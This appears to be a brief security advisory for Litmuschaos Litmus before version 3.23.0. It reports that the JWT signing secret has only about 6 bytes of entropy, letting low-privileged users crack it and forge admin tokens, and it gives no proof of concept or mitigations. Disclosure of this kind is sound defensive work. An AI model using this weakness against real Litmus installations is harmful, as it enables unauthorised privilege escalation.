Lack of entropy allows registered low-privileged users of Litmus to crack valid JWT tokens and gain admin privileges
Litmuschaos:litmus
(,3.23.0)
The Litmus platform uses JWT for authentication and authorization, but the secret being used for signing the JWT is only 6 bytes long at its core, which makes it extremely easy to crack.
No PoC is supplied for this issue
No mitigations are supplied for this issue